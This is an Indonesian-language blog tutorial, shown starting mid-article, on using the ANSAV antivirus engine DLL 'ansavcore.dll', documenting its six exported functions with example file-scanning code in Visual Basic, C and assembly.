Se-instan itukah?, kalau memang benar semudah itu penggunaannya lalu bagaimana dengan kemampuannya? Tenang.., tentang kemampuan jangan khawatir, engine ansav ini merupakan engine detektor virus tercepat saat ini di Indonesia, karena pada basis pemrogramannya sendiri ansav menggunakan bahasa assembly (low level language). Pada test yang saya lakukan untuk men-scan semua virus yang saya koleksi semuanya berjumlah 314 virus dan ditest pada nootebook Pentium 2 Celleron dengan memori 128 MB, pada testnya hanya membutuhkan waktu sekitar 1,5 detik untuk men-scan semua file bervirus sampai habis. Walaupun begitu engine ini memiliki tingkat keakuratan yang tinggi. Jika Anda tidak percaya dengan yang saya katakan, Anda bisa mencobanya sendiri dengan menggunakan spek komputer yang sama dengan diatas, tetapi Anda bisa juga mencobanya pada berbagai spek yang berbeda, karena memang belum saya coba pada komputer dengan spek lain.

Dilihat dari pemrogramannya yang dibuat dengan basis low level language assembly apakah bisa DLL ini dipakai pada kompiler-kompiler tingkat tinggi seperti Visual Basic, C++, dan Delphi? Bisa!, engine ini bisa berjalan pada berbagai macam jenis kompiler yang ada saat ini, untuk itu saya sudah menyertakan contoh source codenya dalam 3 tingkatan bahasa, bahasa tingkat rendah (low level language) menggunakan Assembly 32 bit, Bahasa tingkat menengah (middle level language) menggunakan C, dan bahasa tingkat tinggi (high level language) menggunakan C++ dan Visual Basic.
Sepertinya Anda sudah mulai bosan membacanya, okeh sekarang kita mulai saja pelajarannya.

Mulai Belajar
Apa yang akan Anda lakukan untuk membuat seseorang mau membantu Anda untuk menunjukkan jalan ke suatu tempat yang Anda belum ketahui? Ya.., Anda bisa menanyakan alamat tempatnya pada orang tersebut, sukur-sukur orang tersebut sekalian bersedia mengantarkan Anda sampai tujuan. Tetapi apakah orang yang belum begitu mengenal Anda akan begitu saja bersedia untuk mengantarkan Anda? Walaupun mungkin hal ini terjadi, tetapi saya yakin prosentase kemungkinan hanya berkisar antara 1-5% saja.
Oleh karena itulah sebelum kita memulai praktek pada penulisan listing, terlebih dahulu akan saya perkenalkan Anda kepada DLL ansav ini.

Kalau yang sebelumnya pengenalan sudah saya tuliskan di atas pada bagian “Sedikit tentang DLL ini” tetapi itu hanya sedikit lihatlah kata pertama pada judul tersebut, diAndaikan Anda adalah seorang yang baru saja menemukan orang yang dianggap mampu untuk menunjukkan jalan, maka bagian diatas tadi hanya seperti Anda baru saja mengucapkan “Misi… numpang tanya…”, nah sekarang adalah saatnya Anda untuk membujuk orang itu untuk mengantarkan Anda pada tujuan, dengan cara pertama-tama berkenalan dan sedikit berbasa-basi… he..he..he.. kayaknya cara saya menggambarkan terlalu berlebihan, maklum saya oran]ngnya termasuk orang yang suka mengAndai-Andai dan menghayal tinggiiiiii banget (hanya yang + bukan yang –, kalaupun ada cuma sedikit koq. he..he..he..). Tetapi semua ini saya maksudkan agar proses belajar tidak membosankan dan berharap agar lebih mudah untuk dipahami.


Lebih detail tentang DLL ini
Dibuat menggunakan bahasa ….. (ya saya tahu Anda sudah mengetahuinya di bagian pengenalan pertama diatas)
Nama file asli : “ansavcore.dll”
Memiliki ukuran sangat kecil, pada versi awalnya memiliki ukuran16 KB. Anda tidak perlu lagi khawatir untuk membawanya kemana-mana, karena tidak berat sehingga tidak membutuhkan tukang pikul untuk membawanya. 
Memiliki kecepatan scan tinggi. Pada core enginenya hanya menggunakan sekitar 269 instruksi dasar prosesor jenis x386, dan 18 fungsi eksternal termasuk lokal dan API-nya. Bandingkan dengan instruksi yang dihasilkan oleh kompiler bahasa tingkat tinggi yang bisa mencapai bukan hanya ratusan bahkan bisa sampai ribuan instruksi dan fungsi eksternal yang saling berlompat-lompatan walaupun dengan arsitektur kerja yang sama dengan yang saya buat. Untuk perbandingannya, Anda bisa lihat pada kompiler tingkat tinggi Visual Basic 6.

Mampu berjalan di sistem operasi Windows 98/ME/2K/XP untuk VISTA belum dicoba. Sehingga Anda lebih leluasa untuk mengembangkan antivirusnya.
Pada versi waktu artikel ini mulai ditulis yakni 1.0.0 sudah memiliki 6 fungsi yang siap untuk digunakan, diantaranya:
CheckWithAnsav
AnsavVirusFirst
AnsavVirusNext
AnsavVirusClose
AnsavVirusCount
AnsavGetVersion
Keterangan tentang fungsi-fungsi tersebut :

1. CheckWithAnsav
Membutuhkan 3 parameter, berfungsi untuk memeriksa file dari virus. Fungsi ini memiliki prototipe :

Int CheckWithAnsav (
IN LPSTR File,
OUT LPSTR VirusName,
IN OUT PULONG nSize
);

Note: Prototipe fungsi di atas ditulis dalam format bahasa C. Disini saya akan memakai standar bahasa C dalam penulisan prototipe selanjutnya.
Fungsi ini akan mencoba untuk memeriksa file yang alamat (path) nya diletakkan pada parameter File, apabila virus terdeteksi pada file yang di-scan maka nama virus akan diletakkan pada parameter kedua VirusName, sedangkan parameter terakhir yaitu nSize adalah jumlah karakter dari parameter VirusName. Untuk nSize nilai harus terlebih dahulu diset dengan 30 atau MAX_VIRUSNAME_LENGTH.
Const MAX_VIRUSNAME_LENGTH = 30
Selanjutnya nSize akan menghasilkan output berupa jumlah karakter nama virus yang terdeteksi. Apabila terdeteksi adanya virus maka nilai pengembalian dari fungsi ini adalah 1 atau AN_VIRUS_DETECTED.
Const AN_VIRUS_DETECTED = 1
Dan akan menghasilkan nilai 3 atau AN_SCAN_ERROR pada pengembaliannya apabila dalam operasinya fungsi ini mengalami kesalahan atau terjadi error. Sedangkan apabila file tidak ditemukan maka akan memberikan nilai pengembalian 2 atau ERROR_FILE_NOT_FOUND.

Const AN_SCAN_ERROR = 3
Const ERROR_FILE_NOT_FOUND = 2
2. AnsavVirusFirst
Membutuhkan 2 parameter, berfungsi untuk meng-enumerasikan, atau mendapatkan seluruh nama-nama virus yang ada pada database engine ansav. Adapun 2 parameter yang dibutuhkan adalah parameter VirusName dan nSize, parameter VirusName adalah alamat tempat tampungan untuk nama pertama virus pada data base virus ansav, sedangkan nSize adalah jumlah karakter pada tampungan VirusName.
Fungsi ini meneghasilkan nilai pengembalian berupa handel hFind yang nantinya digunakan untuk mendapatkan nama-nama virus selanjutnya menggunakan fungsi ke 3 AnsavVirusNext.

HANDLE AnsavVirusFirst (
OUT LPSTR VirusName,
IN OUT LONG nSize
);
Apabila operasi yang dilakukan fungsi ini gagal maka nilai pengembaliannya adalah 0 atau NO_MORE_VIRUSES. Dan akan menghasilkan nilai pengembalian -1 atau INVALID_HANDLE_VALUE apabila terjadi kesalahan pada waktu operasinya.
Const NO_MORE_VIRUSES = 0
3. AnsavVirusNext
Membutuhkan 3 parameter, berfungsi untuk mendapatkan nama-nama virus selanjutnya dengan berdasarkan handel yang telah didapatkan dari fungsi ke 2 (AnsavVirusFirst), handel diletakkan pada parameter pertamanya yaitu hFind, sedangkan parameter kedua File berisi alamat tampungan yang nantinya akan berisi nama virus selanjutnya, dan parameter terakhir nSize berisi jumlah karakter nama virus yang ada pada parameter VirusName.

Int AnsavVirusNext (
IN HANDLE hFind,
OUT LPSTR VirusName,
IN OUT PULONG nSize
);
Fungsi ini akan menghasilkan nilai pengembalian 0 atau NO_MORE_VIRUSES apabila daftar virus telah habis dibaca, dan akan menghasilkan nilai pengembalian -1 atau INVALID_HANDLE_VALUE apabila handel salah atau terjadi error pada waktu operasinya.
4. AnsavVirusClose
Membutuhkan 1 parameter hFind berupa handel yang didapat dari fungsi ke 2 (AnsavVirusFirst). Fungsi ini akan menutup sesi pengumpulan daftar nama-nama virus pada database engine-nya.
Fungsi ini memiliki prototipe :

Int AnsavVirusClose(
IN HANDLE hFind
);
Menghasilkan nilai pengembalian 1 apabila operasi berhasil, dan menghasilkan nilai -1 apabila operasi gagal atau terjadi kesalahan pada operasinya.

5. AnsavVirusCount
Tidak membutuhkan parameter apapun. Berfungsi untuk mendapatkan jumlah keseluruhan virus yang ada pada database ansav engine. Jumlah keseluruhan virus didapat dari nilai pengembaliannya.
Fungsi ini memiliki prototipe :

ULONG AnsavVirusCount (Void);
6. AnsavGetVersion
Fungsi terakhir ini membutuhkan parameter yang merujuk pada alamat memori berkapasitas 12 byte dan dibagikan menjadi 3 jenis versi. 4 byte untuk versi major, 4 byte selanjutnya untuk versi minor, 4 byte terakhir untuk versi revisi. Untuk ini sudah saya siapkan bentuk parameternya berupa struktur.

typedef struct _ANSAV_VERSION_INFO {
UINT dwMajor;
UINT dwMinor;
UINT dwRevision;
} ANSAV_VERSION_INFO, *PANSAV_VERSION_INFO;
VOID AnsavGetVersion (
PANSAV_VERSION_INFO lpAvi
);
Cara penggunaan fungsinya ditulis dalam bahasa Visual Basic :

Dim avi As ANSAV_VERSION_INFO
Call AnsavGetVersion(avi)
Hasil yang berupa versi engine ansav akan diletakkan pada variabel “avi”. Untuk mendapatkan versi major bisa dengan perintah “avi.dwMajor”, untuk versi minor bisa dengan perintah “avi.dwMinor”, sedangkan untuk versi revisinya bisa dengan perintah “avi.dwRivision”.
Setelah masa perkenalan dan basa-basi selesai, sebenarnya Anda harus sudah diantar ke tujuan Anda oleh orang yang baru Anda kenali tersebut, tetapi apabila tidak demikian, berarti saya salah duga, karena bisa saja ternyata yang Anda kenali adalah orang buta misalnya .
Sebelum Anda memulai mempraktekkannya, paling tidak Anda harus terlebih dahulu memiliki segala perlengkapan yang akan dibutuhkan nanti dalam pembelajaran ini.
Adapun perlengkapan yang dibutuhkan adalah :

1. Kompiler
Kompiler ini berfungsi untuk meng-kompil atau istilahnya membangun sebuah aplikasi software, dimana aplikasi yang dimaksud atau yang akan kita buat adalah berupa antivirus sederhana.
Kompiler yang diperlukan bisa menggunakan Visual Basic, C, C++ atau Delphi.

2. Debugger (optional)
Jika Anda memang seorang yang selalu melakukan kesalahan atau paling tidak orang yang selalu berhati-hati dalam membuat program saya sarankan untuk tidak pernah lupa melakukan debugging pada setiap aplikasi yang baru Anda buat.
Proses debugging sendiri itu digunakan untuk menganalisa jalannya suatu program dan biasanya untuk mencari letak kesalahan pada suatu sistem aplikasi. Pada beberapa kompiler tingkat tinggi biasanya sudah disertakan program debugger sendiri.

Tapi ini hanya optional, artinya Anda tidak harus atau diwajibkan untuk memiliki program debugger dengan catatan Anda memang orang yang PeDe abis dan orang yang ma’sum istilahnya orang yang tidak pernah melakukan kesalahan , tapi tidak ada satupun orang di dunia ini yang tidak pernah melakukan kesalahan. Jadi akan selalu saya sarankan (recommended) untuk para programmer khususnya pemula.
Adapun jenis-jenis debugger ada sangat banyak bertebaran di sana-sini, Anda bisa memilih sesuai dengan selera dan kesukaan Anda. Contoh macam-macam debugger eksternal yang nge-tren dan banyak dipakai pada abad ini : OllyDebug, IDA Pro, WinDbg dll.

3. Roti coklat (recommended)
Selain 2 perlengkapan diatas saya tambahkan lagi perlengkapan ketiga ini dengan sifat recommended yang artinya saya sarankan kepada Anda yang mudah bosan dan frustasi. Tapi walaupun begitu perlengkapan ketiga ini juga sama optionalnya dengan perlengkapan kedua yaitu program debugger, artinya Anda tidak harus tapi sangat saya sarankan, dimaksudkan untuk menghilangi kejenuhan ketika Anda sudah mulai muak membaca tutorial ini, pejamkan mata… dan makanlah satu coklat lalu ambil nafas panjang kira-kira 1-2 menit, setelah itu Anda coba pelajari kembali, pasti akan lebih plong dan lebih segar meneruskan belajarnya.
Tentang recommended coklat ini sendiri tidak harus coklat, Anda bisa dengan makanan-makanan kesukaan Anda untuk dibarengi ketika Anda sedang dalam proses belajar. Karena sebenarnya coklat itu sendiri adalah makanan kesukaan saya . tapi jangan salah loh.., menurut para ahli ternyata makanan yang mengandung banyak unsur coklat memiliki pengaruh tersendiri yang dapat merangsang sel-sel otak manusia, tentang benar atau tidaknya Wallahu a’lam.:D tapi bukan karena para ahli mengatakan seperti itu lalu saya ikut-ikutan makan coklat, yee… saya memang sudah mulai suka makan coklat sejak umur 5 tahun.
Okeh, dari pada banyak bicara yang gak kunjung selesai, mending kita mulai saja tutorialnya. Untuk tutorialnya akan saya berikan contoh-contohnya dalam penggunaan 6 fungsi yang sudah saya sebutkan diatas, adapun bahasa pemrograman yang akan saya gunakan untuk contoh dalam penulisan listing-nya adalah menggunakan 3 tingkatan bahasa seperti yang pernah saya singgung diatas, low, middle dan high, Assembly, C dan Visual Basic. Tetapi urutannya akan saya buat berdasarkan dengan pemrograman tingkat tinggi terlebih dahulu, yakni Visual Basic.
Oh ya…, jangan lupa sebelum Anda mulai berpraktek, terlebih dahulu letakkan file “ansavcore.dll” pada direktori tempat Anda meletakkan program yang akan Anda buat atau pada direktori project Anda.


1. CheckWithAnsav
Fungsi pertama yang akan saya contohkan adalah fungsi CheckWithAnsav, informasi tentang fungsi ini bisa Anda baca pada tulisan sebelumnya.
Contoh penggunaan fungsi CheckWithAnsav dalam bahasa Visual Basic :
Sebelum Anda bisa menggunakan fungsi ini dari file library “ansavcore.dll”, terlebih dahulu Anda harus mendeklarasikan beberapa kosntanta dan fungsinya. Adapun bentuk deklarasi fungsi ini pada bahasa Visual Basic adalah :

‘ Contoh penggunaan fungsi CheckWithAnsav
‘ pada bahasa Visual Basic
‘
‘ Ditulis oleh : [4NV|e]

Const MAX_VIRUSNAME_LENGTH = 30
Const ERROR_FILE_NOT_FOUND = 2
Const AN_SCAN_ERROR = 3
Const AN_CLEAN = 0

Private Declare Function CheckWithAnsav Lib “ansavcore.dll” _
(ByVal FileName As String, ByVal VirusName As String, nSize As Long) As Long
Note: Karena ruang halaman yang sempit, maka tAnda “_” (underscore) pada contoh listing di atas saya pergunakan sebagai tAnda bahwa listing tersebut diteruskan pada baris selanjutnya. Cara ini akan saya pergunakan pada penulisan listing dalam bahasa Visual Basic selanjutnya.
Setelah Anda menuliskan deklarasinya langkah selanjutnya bisa langsung menuliskan listing kodenya :

Private Sub PeriksaFile()
Dim RetVal As Long
Dim nSize As Long
Dim Buff As String * MAX_VIRUSNAME_LENGTH
Dim NamaVirus As String
nSize = MAX_VIRUSNAME_LENGTH

RetVal = CheckWithAnsav(“C:\file_dicurigai.exe”, _
Buff, nSize)

If RetVal = 1 Then
NamaVirus = Left$(Buff, nSize)

Call MsgBox(“File ini mengandung virus : ” & _
NamaVirus & “, Hati-hati!! “)
Else
Select Case RetVal
Case ERROR_FILE_NOT_FOUND
Call MsgBox(“File yang Anda maksud tidak ditemukan!.”)
Case AN_SCAN_ERROR
Call MsgBox(“Terjadi kesalahan dalam proses scanning.”)
Case AN_CLEAN
Call MsgBox(“File ini bersih dari virus.”)
End Select
End If
End Sub
Analisa kode :
nSize = MAX_VIRUSNAME_LENGTH
RetVal = CheckWithAnsav(“C:\file_dicurigai.exe”, _
Buff, nSize)
Set terlebih dahulu variabel nSize dengan nilai 30 atau yang sudah dibuatkan konstantanya yaitu MAX_VIRUSNAME_LENGTH. Nilai 30 adalah alokasi maximal untuk menampung nama virus. Kemudian periksa file “file_dicurigai.exe” yang ada pada drive “C:\”, tentang nama file yang akan diperiksa Anda bisa menentukan namanya sendiri. Untuk memeriksa file tersebut gunakan fungsi CheckWithAnsav dan letakkan nilai pengembaliannya pada variabel RetVal.

If RetVal = 1 Then
NamaVirus = Left$(Buff, nSize)

Call MsgBox(“File ini mengandung virus : ” & _
NamaVirus & “, Hati-hati!! “)
Kemudian cek berapakah nilai yang dihasilkan dari pengembalian fungsi CheckWithAnsav yang ada pada variabel RetVal, jika (if) nilai pada variabel RetVal = 1 berarti file tersebut (“file_dicurigai.exe”). mengandung virus.
Kemudian apabila memang virus terdeteksi maka dapatkan nama virus yang terdeteksi tersebut menggunakan perintah Left untuk men-trim (memperpendek jangkauan string) dan letakkan nama tersebut pada variabel NamaVirus, lalu tampilkan pesan “File ini mengandung virus : “, apabila virus yang terdeteksi adalah virus “gombal” maka akan ditampilkan pesan seperti berikut :
“File ini mengandung virus : W32/Gombal, Hati-hati!! “

Else
Select Case RetVal
Case ERROR_FILE_NOT_FOUND
Call MsgBox(“File yang Anda maksud tidak ditemukan!.”)
Case AN_SCAN_ERROR
Call MsgBox(“Terjadi kesalahan dalam proses scanning.”)
Case AN_CLEAN
Call MsgBox(“File ini bersih dari virus.”)
End Select
End If
End Su
Apabila virus tidak atau belum terdeteksi, maka periksa status operasi. Perintah Select Case RetVal disini digunakan untuk memeriksa status operasi apakah berhasil atau terjadi error. Apabila nilai pengembalian berupa ERROR_FILE_NOT_FOUND berarti file yang dimakusd untuk di-scan tidak ada (tidak eksis) maka tampilkan pesan kesalahan “File yang Anda maksud tidak ditemukan!”. Apabila nilai pengembalian berupa AN_SCAN_ERROR berarti terjadi kesalahan dalam melakukan scanning pada file tersebut, maka tampilkan pesan “Terjadi kesalahan dalam proses scanning”. Terakhir apabila nilai pengembalian berupa 0 atau AN_CLEAN berarti file tersebut tidak mengandung virus atau bersih.
Contoh penggunaan fungsi CheckWithAnsav dalam bahasa C :

/*
Contoh penggunaan fungsi CheckWithAnsav
pada bahasa C

Ditulis oleh : [girrel13]
*/

#include <windows.h>
#include <stdio.h>

int const AN_VIRUS_DETECTED = 1;
int const AN_SCAN_ERROR = 3;
int const MAX_VIRUS_LENGTH = 30;

typedef STDCALL int _CheckWithAnsav(
LPSTR FileName,
LPSTR VirusName,
PULONG nSize
);
static _CheckWithAnsav *CheckWithAnsav;
void PeriksaFile(void);

void PeriksaFile(void){
char vName[30];
unsigned long nSize=MAX_VIRUS_LENGTH;

CheckWithAnsav = (_CheckWithAnsav*)
GetProcAddress(LoadLibrary(“ansavcore.dll”),
“CheckWithAnsav”);

int RetVal = CheckWithAnsav( “C:\file_dicurigai.exe”,
vName,&nSize);

if (RetVal==AN_VIRUS_DETECTED){
printf(“\nFile ini mengandung virus : %s”
“, Hati-hati!! “,vName);
} else {
switch (RetVal) {
case ERROR_FILE_NOT_FOUND:
{
printf(“\nFile yang Anda maksud “
“tidak ditemukan!.”);
} break;
case AN_SCAN_ERROR:
{
printf(“\nTerjadi kesalahan dalam “
“proses scanning.”);
} break;
default:
{
printf(“\nFile ini bersih dari virus.”);
}
}
}
}
Analisa kode pada bahasa C tidak jauh berbeda dengan yang menggunakan bahasa Visual Basic, kedua-duanya hampir memiliki cara kerja yang sama, jadi tidak dibutuhkan analisa kode lagi disini. Saya yakin Anda bisa memahaminya.
Contoh penggunaan fungsi CheckWithAnsav dalam bahasa Assembly :

Comment ~
Contoh penggunaan fungsi CheckWithAnsav
pada bahasa Assembly

Ditulis oleh : [girrel13]
~
.386
.model flat, stdcall
option casemap: none

include windows.inc
include user32.inc
include kernel32.inc

includelib user32.lib
includelib kernel32.lib

.const
AN_CLEAN             equ 0
AN_VIRUS_DETECTED    equ 1
AN_SCAN_ERROR        equ 3
MAX_VIRUS_LENGTH     equ 30

.data?
_ScanWithAnsav       dd ?
nSize                dd ?
vName                db MAX_VIRUS_LENGTH dup(?)
Buffer               db 256 (?)

.data
szAppName            db ‘Ansav in asm’,0
szAnsavCoreDll       db ‘ansavcore.dll’,0
szScanWithAnsav      db ‘CheckWithAnsav’,0
szFile               db ‘C:\file_dicurigai.exe’,0
szVirusTdtks         db ‘File ini mengandung virus : %s, ‘
db ‘Hati-hati!! ‘,0
szBersih             db ‘File ini bersih dari virus.’,0
szFileTidakAda       db ‘File yang Anda maksud tidak ditemukan!’,0
szError              db ‘Terjadi kesalahan dalam proses scanning.’,0
.code
start:
PeriksaFile proc

push    offset szAnsavCoreDll
call    LoadLibrary
push    offset szScanWithAnsav
push    eax
call    GetProcAddress

mov     _ScanWithAnsav,eax
mov     nSize,MAX_VIRUS_LENGTH

push    offset nSize
push    offset vName
push    offset szFile
call    _ScanWithAnsav
test    eax,eax
jz      bersih
cmp     eax,AN_VIRUS_DETECTED
je      virus_terdeteksi
cmp     eax,ERROR_FILE_NOT_FOUND
je      file_tidak_ada
cmp     eax,AN_SCAN_ERROR
je      error
jmp     tamat

virus_terdeteksi:
push    offset vName
push    offset szVirusTdtks
push    offset Buffer
call    wsprintf
add     esp,4*3
lea     eax,Buffer
call    tampilkan_pesan
jmp     tamat

file_tidak_ada:
lea     eax,szAppName
call    tampilkan_pesan
jmp     tamat

error:
lea     eax,szAppName
call    tampilkan_pesan
jmp     tamat

bersih:
lea     eax,szAppName
call    tampilkan_pesan

tamat:
xor     eax,eax
ret

tampilkan_pesan:
push    0
push    offset szAppName
push    eax
push    0
call    MessageBox
ret
PeriksaFile endp
end start
Sama dengan pada bahasa-bahasa sebelumnya, cara kerjanya pada bahasa assembly juga sama.
Untuk menghemat waktu, tenaga dan pikiran , contoh fungsi-fungsi yang lain nantinya akan saya tulis dalam satu arsip saja, dengan pembagian berdasarkan bahasanya. Contoh akan saya tulis dengan full source code dan akan saya jadikan satu dalam file terkompresi (zip). Dan bisa di download pada postingan selanjutnya. Jadi intinya saya hanya akan mengatakan kalau artikel ini adalah “masih bersambung…” hiks… sulit banget sih ngomongnya… ~_~”
[girrel13],
Read More...

Related Posts Plugin for WordPress, Blogger...
T123N17Y N1464W4N
Related Posts Plugin for WordPress, Blogger...